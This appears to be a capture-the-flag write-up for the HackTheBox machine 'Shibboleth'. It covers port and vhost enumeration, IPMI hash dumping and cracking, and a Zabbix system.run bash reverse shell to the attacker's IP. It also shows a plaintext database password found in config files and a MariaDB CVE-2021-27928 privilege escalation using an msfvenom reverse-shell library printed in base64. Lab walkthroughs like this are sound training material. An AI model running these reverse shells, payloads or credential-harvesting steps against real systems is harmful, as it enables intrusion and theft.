Enumeration

Starting Nmap 7.92 ( <https://nmap.org> ) at 2021-11-18 12:15 EET
Nmap scan report for 10.10.11.124
Host is up (0.24s latency).
Not shown: 99 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.41
|_http-title: Did not follow redirect to <http://shibboleth.htb/>
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: Host: shibboleth.htb

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 17.12 seconds

We can add the shibboleth.htb domain to the /etc/hosts file. We can then access to http://shibboleth.htb/. The page seems to be only a template page, so we will do a dir search with gobuster.

gobuster -w /usr/share/dirbuster/directory-list-2.3-medium.txt dir --url <http://shibboleth.htb>

We are able to list the files in some dirs like /assets or /contact, but nothing important there.

We can explore also some subdomains with the vhost option.

gobuster vhost --url shibboleth.htb --wordlist /usr/share/dirbuster/directory-list-2.3-medium.txt | grep 'Status: 200'

Found: monitor.shibboleth.htb (Status: 200) [Size: 3686]
Found: monitoring.shibboleth.htb (Status: 200) [Size: 3686]
Found: Monitoring.shibboleth.htb (Status: 200) [Size: 3686]
Found: Monitor.shibboleth.htb (Status: 200) [Size: 3686]
Found: zabbix.shibboleth.htb (Status: 200) [Size: 3686]

monitor and monitoring subdomains seem to point to the same service.

Scanning for udp also shows some results:

Starting Nmap 7.92 ( <https://nmap.org> ) at 2021-11-18 15:37 EET
Nmap scan report for shibboleth.htb (10.10.11.124)
Host is up (0.072s latency).
Not shown: 99 closed tcp ports (reset), 89 closed udp ports (port-unreach)
PORT      STATE         SERVICE         VERSION
80/tcp    open          tcpwrapped
|_http-title: FlexStart Bootstrap Template - Index
53/udp    open|filtered domain
138/udp   open|filtered netbios-dgm
623/udp   open          asf-rmcp?
1718/udp  open|filtered h225gatedisc
5060/udp  open|filtered sip
10000/udp open|filtered ndmp
20031/udp open|filtered bakbonenetvault
30718/udp open|filtered unknown
32768/udp open|filtered omad
49154/udp open|filtered unknown
49182/udp open|filtered unknown

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 378.48 seconds

Getting the foothold

The port 623 is an IPMI which is a protocol used by BMCs to monitor servers and computers. To enumerate more, we can:

msfconsole
use auxiliary/scanner/ipmi/ipmi_version
set RHOSTS shibboleth.htb
run

We will get some info about the service and how users are authenticated. It is running IPMI-2.0, which may have some vulnerabilities.

[*] Sending IPMI requests to 10.10.11.124->10.10.11.124 (1 hosts)
[+] 10.10.11.124:623 - IPMI - IPMI-2.0 UserAuth(auth_msg, auth_user, non_null_user) PassAuth(password, md5, md2, null) Level(1.5, 2.0)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We are going to try the possible vulnerabilities of this version. I tried Bypass via Cipher 0 with no result, but Remote Password Hash Retrieval seems to work:

use auxiliary/scanner/ipmi/ipmi_dumphashes
set RHOSTS shibboleth.htb
run

We get an administrator hash.

[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:babfa27082050000d2c733c4d424975196bdc19a64a62f5bc2ab8ba11db018c20794ffa4f67c85aaa123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:e886824eced6b6f27199194b7dce7d2779fcd8b8
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

We can use the option OUTPUT_HASHCAT_FILE to output it as hashcat format to try decrypting it.

set OUTPUT_HASHCAT_FILE hash.txt

If we run hashcat as usual:

hashcat hash.txt /usr/share/dict/rockyou.txt

we will get the password ilovepumkinpie1 for Administrator.

We can use those credentials to log into zabbix.shibboleth.htb. We can confirm the Zabbix version is 5.0.17.

Getting the user flag

I tried accessing the scripts page: http://zabbix.shibboleth.htb/zabbix.php?action=script.list with no success as it appears we don’t have administrator rights.

In Configuration > Hosts > Items appear listed some commands, such as system.cpu.util[,softirq]. We may be able to execute a system.run.

system.run["bash -c 'bash -i >& /dev/tcp/10.10.14.100/6666 0>&1'"]

I will listen to the conection with pwncat:

pwncat -lv 6666

And we are in! We can now see the users that have a home. We probably have to escalate to ipmi-svc.

zabbix@shibboleth:/home$ ls -la
ls -la
total 12
drwxr-xr-x  3 root     root     4096 Oct 16 12:24 .
drwxr-xr-x 19 root     root     4096 Oct 16 16:41 ..
drwxr-xr-x  3 ipmi-svc ipmi-svc 4096 Oct 16 12:23 ipmi-svc

Zabbix probably uses a database, lets see the ports listening:

zabbix@shibboleth:/$ netstat -tulpn | grep LISTEN

netstat -tulpn | grep LISTEN
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 0.0.0.0:10050           0.0.0.0:*               LISTEN      1139/zabbix_agentd
tcp        0      0 0.0.0.0:10051           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::10050                :::*                    LISTEN      1139/zabbix_agentd
tcp6       0      0 :::10051                :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -

It seems like there is a mysql instance (the default port is 3306). We cannot access it with the password we got before.

But we can access the user with that password (I feel stupid 🙂).

zabbix@shibboleth:/$ su ipmi-svc
Password: ilovepumpkinpie1

Privilege escalation

We will try to find the configuration files for zabbix.

ipmi-svc@shibboleth:~$ find / -name '*zabbix*' 2>/dev/null

It seems like they are in /etc/zabbix. Let’s do some password find:

ipmi-svc@shibboleth:/etc/zabbix$ grep -iR password

We find the following lines. One of those contains a plain text password for the database.

zabbix_server.conf.dpkg-dist:### Option: DBPassword
zabbix_server.conf.dpkg-dist:#  Database password.
zabbix_server.conf.dpkg-dist:#  Comment this line if no password is used.
zabbix_server.conf.dpkg-dist:# DBPassword=
zabbix_server.conf:### Option: DBPassword
zabbix_server.conf:#    Database password.
zabbix_server.conf:#    Comment this line if no password is used.
zabbix_server.conf:DBPassword=bloooarskybluh

We can try the obtained password and it works!

ipmi-svc@shibboleth:/etc/zabbix$ mysql --user=zabbix --password=bloooarskybluh
Welcome to the MariaDB monitor.  Commands end with ; or \\g.
Your MariaDB connection id is 918
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.

MariaDB [(none)]>

That MariaDB version is vulnerable. We can perform the exploit by following the steps in this repository’s README:

GitHub - Al1ex/CVE-2021-27928: CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞

CVE-2021-27928 MariaDB/MySQL-'wsrep provider' 命令注入漏洞 - Al1ex/CVE-2021-27928

https://github.com/Al1ex/CVE-2021-27928

Generate the exploit:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.167 LPORT=6667 -f elf-so -o CVE-2021-27928.so

Encode it as base64 and copy it:

cat CVE-2021-27928.so | base64
f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3AEAAAAAAAAmAgAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAailYmWoCX2oBXg8FSJdIuQIAGgsKCg6nUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlI
uy9iaW4vc2gAU0iJ51JXSInmDwU=

Then setup the listener (whatever you want, I used netcat).

Then, decode it in the target machine:

echo -e "f0VMRgIBAQAAAAAAAAAAAAMAPgABAAAAkgEAAAAAAABAAAAAAAAAALAAAAAAAAAAAAAAAEAAOAAC
AEAAAgABAAEAAAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA3AEAAAAAAAAmAgAAAAAAAAAQ
AAAAAAAAAgAAAAcAAAAwAQAAAAAAADABAAAAAAAAMAEAAAAAAABgAAAAAAAAAGAAAAAAAAAAABAA
AAAAAAABAAAABgAAAAAAAAAAAAAAMAEAAAAAAAAwAQAAAAAAAGAAAAAAAAAAAAAAAAAAAAAIAAAA
AAAAAAcAAAAAAAAAAAAAAAMAAAAAAAAAAAAAAJABAAAAAAAAkAEAAAAAAAACAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAwAAAAAAAAAkgEAAAAAAAAFAAAAAAAAAJABAAAAAAAABgAAAAAA
AACQAQAAAAAAAAoAAAAAAAAAAAAAAAAAAAALAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAailYmWoCX2oBXg8FSJdIuQIAGgsKCg6nUUiJ5moQWmoqWA8FagNeSP/OaiFYDwV19mo7WJlI
uy9iaW4vc2gAU0iJ51JXSInmDwU=" | base64 -d >/tmp/exploit.so

Connect again to the MariaDB instance and set the wsrep_provider to the decoded exploit. You will get an error of lost connection as soon as the reverse shell is established.

MariaDB [(none)]> SET GLOBAL wsrep_provider="/tmp/exploit.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query

And now we can simply grab the root flag!

HackTheBox Writeup: Shibboleth

Enumeration

Getting the foothold

Getting the user flag

Privilege escalation

References

Enumeration#

Getting the foothold#

Getting the user flag#

Privilege escalation#

References#

Enumeration

Getting the foothold

Getting the user flag

Privilege escalation

References